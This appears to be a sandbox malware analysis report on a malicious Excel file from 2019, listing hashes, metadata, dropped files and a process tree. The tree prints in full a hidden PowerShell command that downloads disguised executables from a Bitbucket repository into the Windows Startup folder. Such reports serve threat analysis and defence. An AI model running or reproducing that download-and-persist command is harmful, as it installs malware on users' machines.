File name: | 2a28851adbc88c3335c6378c1f02df7f92b6912bbba8515186de194cb284993a |
Full analysis: | https://app.any.run/tasks/e0e501da-16f7-4d9d-8e6b-b64517999aff |
Verdict: | Malicious activity |
Analysis date: | March 21, 2019, 22:18:37 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.spreadsheetml.sheet |
File info: | Microsoft Excel 2007+ |
MD5: | 6BA7890D1FD39FD3BDE3F5E29DF62AAC |
SHA1: | 6A57118CF2E07AB50D76D3BEAA114E96EC9B7941 |
SHA256: | 2A28851ADBC88C3335C6378C1F02DF7F92B6912BBBA8515186DE194CB284993A |
SSDEEP: | 384:ohtJe3e9nJasT/UlM9z55u0S19SNL3N+lbIEmEDq/iuv9OrDnWa4t:yJbJjxtMDDyLklbIEPeausvWDt |
.xlsx | | | Excel Microsoft Office Open XML Format document (61.2) |
---|---|---|
.zip | | | Open Packaging Conventions container (31.5) |
.zip | | | ZIP compressed archive (7.2) |
AppVersion: | 16.03 |
---|---|
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
Company: | - |
TitlesOfParts: | Sheet1 |
HeadingPairs: |
|
ScaleCrop: | No |
DocSecurity: | None |
Application: | Microsoft Excel |
ModifyDate: | 2019:03:14 16:43:56Z |
CreateDate: | 2018:11:03 15:16:32Z |
LastModifiedBy: | r |
ZipFileName: | [Content_Types].xml |
---|---|
ZipUncompressedSize: | 1675 |
ZipCompressedSize: | 431 |
ZipCRC: | 0x6560a6f0 |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0006 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2928 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
948 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\UniversalCrypto.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | EXCEL.EXE |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 | ||||
2832 | "C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\AppData\Local\Temp\Rar$DIa948.25201\LICENSE.txt | C:\Windows\system32\NOTEPAD.EXE | — | WinRAR.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Notepad Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3812 | "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri "https://bitbucket.org/hiyun-ki/universal-crypto/downloads/servicesprint.png" -OutFile C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\servicesprint.lnk; -nop -w hidden [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri "https://bitbucket.org/hiyun-ki/universal-crypto/downloads/pcmon.png" -OutFile C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start` Menu\Programs\Startup\pcmon.exe | C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WinRAR.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2928 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR62C.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3812 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XA1SXONZTDONDX4ZF0C4.temp | — | |
MD5:— | SHA256:— | |||
948 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIa948.26130\UniversalCrypto-scanner.lnk | lnk | |
MD5:6CD8352A312D3F58AE3DB17293825DC9 | SHA256:150B92C113DB1956CB1BA07F9D74B68017FDB4D3FFAE3869A6C8198699FECB7E | |||
948 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIa948.25201\LICENSE.txt | text | |
MD5:6002BEBC94A9E50598F7E7A185837B66 | SHA256:9139DBC15F10633C6AEF1D959B6F00CC26809C7C5F76E9103175772D857C15B4 | |||
3812 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5f3d8aaae8f69194.customDestinations-ms | binary | |
MD5:9A295A4F47D5D90072B5A4F698AF44B6 | SHA256:AFFFAFE39439975B791B1F179B8940BC14DF8F94F5BA41B9CAADF025E8FB8B0C | |||
2928 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\UniversalCrypto.zip | compressed | |
MD5:03BCD9FC092ABA4675986BFF5F333310 | SHA256:318806A1E6B9E7A1243598EED36FA610E5ED437244ED6C259C0AFDE3DD23BD4F | |||
2928 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2ABD209E.emf | emf | |
MD5:71177D9512C0AD9D0B9B94388028ACC8 | SHA256:B177E0281B98CD231B8E1525B8A7D99B42D24D839B7975877BF635EF94961E93 |